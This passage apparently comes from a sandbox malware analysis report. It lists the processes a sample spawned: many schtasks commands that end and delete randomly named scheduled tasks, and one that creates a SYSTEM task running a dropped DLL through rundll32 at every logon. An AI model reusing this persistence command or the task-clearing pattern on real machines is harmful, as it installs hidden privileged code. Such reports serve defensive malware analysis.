schtasks /END /TN "lAtvBWBhjAuAUSkhaQr"
2⤵
PID:2864

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr"
2⤵
PID:1852

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lAtvBWBhjAuAUSkhaQr2"
2⤵
PID:1000

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr2"
2⤵
PID:2892

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JknGisNDLGEJSyipVcP"
2⤵
PID:2884

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP"
2⤵
PID:1456

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JknGisNDLGEJSyipVcP2"
2⤵
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP2"
2⤵
PID:1752

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YymCzRAEFuptGYVgYyY"
2⤵
PID:2228

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY"
2⤵
PID:964

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YymCzRAEFuptGYVgYyY2"
2⤵
PID:2952

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY2"
2⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "axFcpconfnvMPcfoPBw"
2⤵
PID:904

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw"
2⤵
PID:1152

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "axFcpconfnvMPcfoPBw2"
2⤵
PID:2240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw2"
2⤵
PID:2416

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TbObhCfvGhvWYtTlxMQ"
2⤵
PID:1504

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ"
2⤵
PID:2548

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TbObhCfvGhvWYtTlxMQ2"
2⤵
PID:1972

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ2"
2⤵
PID:2444

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pmOjfgpJgprtFswRBIC"
2⤵
PID:2480

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC"
2⤵
PID:2376

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pmOjfgpJgprtFswRBIC2"
2⤵
PID:2332

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC2"
2⤵
PID:1652

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JtXAmmmjhUPKgDhgNcr"
2⤵
PID:2832

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr"
2⤵
PID:2252

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JtXAmmmjhUPKgDhgNcr2"
2⤵
PID:2560

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr2"
2⤵
PID:2988

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nBvEvDWPBldxaKpKfqN"
2⤵
PID:2748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN"
2⤵
PID:2260

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nBvEvDWPBldxaKpKfqN2"
2⤵
PID:804

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN2"
2⤵
PID:1924

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jzhFTGrHTBEHdwhDlHk"
2⤵
PID:2060

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk"
2⤵
PID:1832

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jzhFTGrHTBEHdwhDlHk2"
2⤵
PID:320

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk2"
2⤵
PID:1536

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DhjJYrdSzhVIWJoLuaT"
2⤵
PID:1156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT"
2⤵
PID:1660

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DhjJYrdSzhVIWJoLuaT2"
2⤵
PID:1920

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT2"
2⤵
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "EEmPqVqEkOrqytjIixi"
2⤵
PID:2296

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi"
2⤵
PID:996

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "EEmPqVqEkOrqytjIixi2"
2⤵
PID:532

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi2"
2⤵
PID:1048

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DuQhIaNDUkixqBSFQah"
2⤵
PID:1916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah"
2⤵
PID:1404

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DuQhIaNDUkixqBSFQah2"
2⤵
PID:2128

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah2"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XOocscxzenxPQcbeNoc"
2⤵
PID:1080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc"
2⤵
PID:2640

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XOocscxzenxPQcbeNoc2"
2⤵
PID:2656

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc2"
2⤵
PID:2044

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "CpcpIyQZEHEGDGaVcoP"
2⤵
PID:2932

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP"
2⤵
PID:2956

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "CpcpIyQZEHEGDGaVcoP2"
2⤵
PID:2888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP2"
2⤵
PID:2668

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TEwqxUjyIqmpTYSBiqY"
2⤵
PID:1716

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY"
2⤵
PID:2976

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TEwqxUjyIqmpTYSBiqY2"
2⤵
PID:1076

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY2"
2⤵
PID:3036

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dcKGwvyalvyuxhUFuri"
2⤵
PID:2856

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri"
2⤵
PID:2248

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dcKGwvyalvyuxhUFuri2"
2⤵
PID:1676

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri2"
2⤵
PID:2836

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LjPBjCkxU\vQlWBX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RqexYqdylWmHLyb" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:692

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ODelVPTMCGECKgw"
2⤵
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ODelVPTMCGECKgw"
2⤵
PID:1020

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ODelVPTMCGECKgw2"
2⤵
PID:1752

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ODelVPTMCGECKgw2"
2⤵
PID:2224

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "NuQkbDOvmjzyikR"
2⤵
PID:112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "NuQkbDOvmjzyikR"
2⤵
PID:2952

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "NuQkbDOvmjzyikR2"
2⤵
PID:1960

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "NuQkbDOvmjzyikR2"
2⤵
PID:904

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PVbqEphBRhdhSar"
2⤵
PID:1668

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PVbqEphBRhdhSar"
2⤵
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PVbqEphBRhdhSar2"
2⤵
PID:2416

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PVbqEphBRhdhSar2"
2⤵
PID:1504

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rXnzilGmloByZja"
2⤵
PID:2548

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rXnzilGmloByZja"
2⤵
PID:2532

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rXnzilGmloByZja2"
2⤵
PID:2604

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rXnzilGmloByZja2"
2⤵
PID:2388

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OrQOZlNdkHouDfl"
2⤵
PID:2564

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OrQOZlNdkHouDfl"
2⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OrQOZlNdkHouDfl2"
2⤵
PID:2328

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OrQOZlNdkHouDfl2"
2⤵
PID:2568

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MPBTKOKNGQXdpYB"
2⤵
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MPBTKOKNGQXdpYB"
2⤵
PID:2792

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MPBTKOKNGQXdpYB2"
2⤵
PID:2140

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MPBTKOKNGQXdpYB2"
2⤵
PID:2964

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oHFOlowMWYvVWRa"
2⤵
PID:2760

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oHFOlowMWYvVWRa"
2⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oHFOlowMWYvVWRa2"
2⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oHFOlowMWYvVWRa2"
2⤵
PID:2304

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZhEuxlviVGbffes"
2⤵
PID:1496

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZhEuxlviVGbffes"
2⤵
PID:320

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZhEuxlviVGbffes2"
2⤵
PID:2396

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZhEuxlviVGbffes2"
2⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BzuHQmwIdSJdkMh"
2⤵
PID:392

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BzuHQmwIdSJdkMh"
2⤵
PID:600

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BzuHQmwIdSJdkMh2"
2⤵
PID:2112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BzuHQmwIdSJdkMh2"
2⤵
PID:1792

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BrpDRukwPjenXAP"
2⤵
PID:996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BrpDRukwPjenXAP"
2⤵
PID:2276

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BrpDRukwPjenXAP2"
2⤵
PID:1544

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BrpDRukwPjenXAP2"
2⤵
PID:2368

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sgHQxILjtpUwkEl"
2⤵
PID:1176

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sgHQxILjtpUwkEl"
2⤵
PID:2992

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sgHQxILjtpUwkEl2"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sgHQxILjtpUwkEl2"
2⤵
PID:2428

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rOlVqeNcMNUSjbL"
2⤵
PID:2620

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rOlVqeNcMNUSjbL"
2⤵
PID:2660

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rOlVqeNcMNUSjbL2"
2⤵
PID:2512

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rOlVqeNcMNUSjbL2"
2⤵
PID:2932

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vzkuwrRCcPzOovd"
2⤵
PID:656

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vzkuwrRCcPzOovd"
2⤵
PID:352

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vzkuwrRCcPzOovd2"
2⤵
PID:1112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vzkuwrRCcPzOovd2"
2⤵
PID:1008

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JciSvjuACFCpPuk"
2⤵
PID:2976

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JciSvjuACFCpPuk"
2⤵
PID:436

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JciSvjuACFCpPuk2"
2⤵
PID:2828

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JciSvjuACFCpPuk2"
2⤵
PID:2856

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RvLAFMCfsYAmjBx"
2⤵
PID:2840

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RvLAFMCfsYAmjBx"
2⤵
PID:1676

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RvLAFMCfsYAmjBx2"
2⤵
PID:2836

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RvLAFMCfsYAmjBx2"
2⤵
PID:876

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "xnzNwjgxPIMAgxD"
2⤵
PID:1516

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xnzNwjgxPIMAgxD"
2⤵
PID:2212

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "xnzNwjgxPIMAgxD2"
2⤵
PID:1464

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xnzNwjgxPIMAgxD2"
2⤵
PID:2912

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "upvCizsQstLVhTX"
2⤵
PID:2152

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "upvCizsQstLVhTX"
2⤵
PID:560

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "upvCizsQstLVhTX2"
2⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "upvCizsQstLVhTX2"
2⤵
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sebDCftpEoxQGwR"
2⤵
PID:2736

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sebDCftpEoxQGwR"
2⤵
PID:1472

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sebDCftpEoxQGwR2"
2⤵
PID:1500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sebDCftpEoxQGwR2"
2⤵
PID:892

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kGGYvMdxzKuBmUA"
2⤵
PID:2996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kGGYvMdxzKuBmUA"
2⤵
PID:2556

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kGGYvMdxzKuBmUA2"
2⤵
PID:2436

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kGGYvMdxzKuBmUA2"
2⤵
PID:2404

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "VlcqrMUnqCdtcYE"
2⤵
PID:2376

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "VlcqrMUnqCdtcYE"
2⤵
PID:2332

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "VlcqrMUnqCdtcYE2"
2⤵
PID:2380

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "VlcqrMUnqCdtcYE2"
2⤵
PID:1572

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yyQridzVWXzzcT"
2⤵
PID:2568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yyQridzVWXzzcT"
2⤵
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FCfOZWamfTDXrH"
2⤵
PID:2124

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FCfOZWamfTDXrH"
2⤵
PID:2140

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pvGIKDreVSBaRR"
2⤵
PID:2964

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pvGIKDreVSBaRR"
2⤵
PID:2760

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jIbkXIHNAklabT"
2⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jIbkXIHNAklabT"
2⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nfEzZvDJpGIxHg"
2⤵
PID:3040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nfEzZvDJpGIxHg"
2⤵
PID:2060

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ExPuUBSIqiUvrE"
2⤵
PID:2288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ExPuUBSIqiUvrE"
2⤵
PID:1496

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nGHNjHLpNVwfpH"
2⤵
PID:320

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nGHNjHLpNVwfpH"
2⤵
PID:2396

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "szhqlLvvAtuMdL"
2⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "szhqlLvvAtuMdL"
2⤵
PID:392

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "UChhjnNtERVtch"
2⤵
PID:600

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "UChhjnNtERVtch"
2⤵
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SvPmLaFiyNhJEE"
2⤵
PID:2296

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SvPmLaFiyNhJEE"
2⤵
PID:1460

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XtUsujuJqCIjis"
2⤵
PID:1296

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XtUsujuJqCIjis"
2⤵
PID:1412

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "mmnKyFwKoxWldP"
2⤵
PID:1436

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mmnKyFwKoxWldP"
2⤵
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YIRiNcmpuGXKMp"
2⤵
PID:2732

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YIRiNcmpuGXKMp"
2⤵
PID:2652

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dOGQydlyhLHPZb"
2⤵
PID:2188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dOGQydlyhLHPZb"
2⤵
PID:2644

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bUqXeDfXwDeSyh"
2⤵
PID:2028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bUqXeDfXwDeSyh"
2⤵
PID:2628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kFksENUvgeEftn"
2⤵
PID:788

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kFksENUvgeEftn"
2⤵
PID:2648

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "WeIhAxgzFxFdin"
2⤵
PID:2484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WeIhAxgzFxFdin"
2⤵
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSvwJbqBxDXeSH"
2⤵
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSvwJbqBxDXeSH"
2⤵
PID:916

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "AWsjqmbGbjSzjt"
2⤵
PID:1076

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "AWsjqmbGbjSzjt"
2⤵
PID:3036

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "WIZvCLhyiJeIYW"
2⤵
PID:2804

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WIZvCLhyiJeIYW"
2⤵
PID:452

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hvhndarYUHapy"
2⤵
PID:1788

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hvhndarYUHapy"
2⤵
PID:932

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hvhndarYUHapy2"
2⤵
PID:2884

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hvhndarYUHapy2"
2⤵
PID:1456

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vYnQEgzpFpMeU"
2⤵
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vYnQEgzpFpMeU"
2⤵
PID:1276

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vYnQEgzpFpMeU2"
2⤵
PID:2912

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vYnQEgzpFpMeU2"
2⤵
PID:1844

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eLcVqmXNBWwuu"
2⤵
PID:560

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eLcVqmXNBWwuu"
2⤵
PID:1960

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eLcVqmXNBWwuu2"
2⤵
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eLcVqmXNBWwuu2"
2⤵
PID:1668

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZmZKbjdnaUYqy"
2⤵
PID:1620

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZmZKbjdnaUYqy"
2⤵
PID:2528

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZmZKbjdnaUYqy2"
2⤵
PID:892

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZmZKbjdnaUYqy2"
2⤵
PID:1596

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSdZUpBHWsjUN"
2⤵
PID:2432

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSdZUpBHWsjUN"
2⤵
PID:2436

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSdZUpBHWsjUN2"
2⤵
PID:2092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSdZUpBHWsjUN2"
2⤵
PID:2356

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BDTQSCAhuviSt"
2⤵
PID:2264

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BDTQSCAhuviSt"
2⤵
PID:2380

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BDTQSCAhuviSt2"
2⤵
PID:1572

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BDTQSCAhuviSt2"
2⤵
PID:2568

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bnDdviFrBdSHm"
2⤵
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bnDdviFrBdSHm"
2⤵
PID:2124

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bnDdviFrBdSHm2"
2⤵
PID:2140

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bnDdviFrBdSHm2"
2⤵
PID:2964

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oqzeCtSumDxKN"
2⤵
PID:2760

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oqzeCtSumDxKN"
2⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oqzeCtSumDxKN2"
2⤵
PID:2340

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oqzeCtSumDxKN2"
2⤵
PID:3040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRWdzfOuEBFOt"
2⤵
PID:1548

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRWdzfOuEBFOt"
2⤵
PID:2504

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRWdzfOuEBFOt2"
2⤵
PID:2352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRWdzfOuEBFOt2"
2⤵
PID:2280

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SqVkWMCzQJLkq"
2⤵
PID:1156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SqVkWMCzQJLkq"
2⤵
PID:1660

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SqVkWMCzQJLkq2"
2⤵
PID:2020

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SqVkWMCzQJLkq2"
2⤵
PID:2096

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pepCFjUQgLQiC"
2⤵
PID:1792

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pepCFjUQgLQiC"
2⤵
PID:2024

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pepCFjUQgLQiC2"
2⤵
PID:3056

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pepCFjUQgLQiC2"
2⤵
PID:1048

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uHiXiVeYNhlEV"
2⤵
PID:1916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uHiXiVeYNhlEV"
2⤵
PID:1404

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uHiXiVeYNhlEV2"
2⤵
PID:2968

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uHiXiVeYNhlEV2"
2⤵
PID:1080

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XzgsIWcHHmecE"
2⤵
PID:1936

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XzgsIWcHHmecE"
2⤵
PID:2960

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XzgsIWcHHmecE2"
2⤵
PID:2700

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XzgsIWcHHmecE2"
2⤵
PID:2028

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YAjsxgSIQquBU"
2⤵
PID:2164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YAjsxgSIQquBU"
2⤵
PID:2956

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YAjsxgSIQquBU2"
2⤵
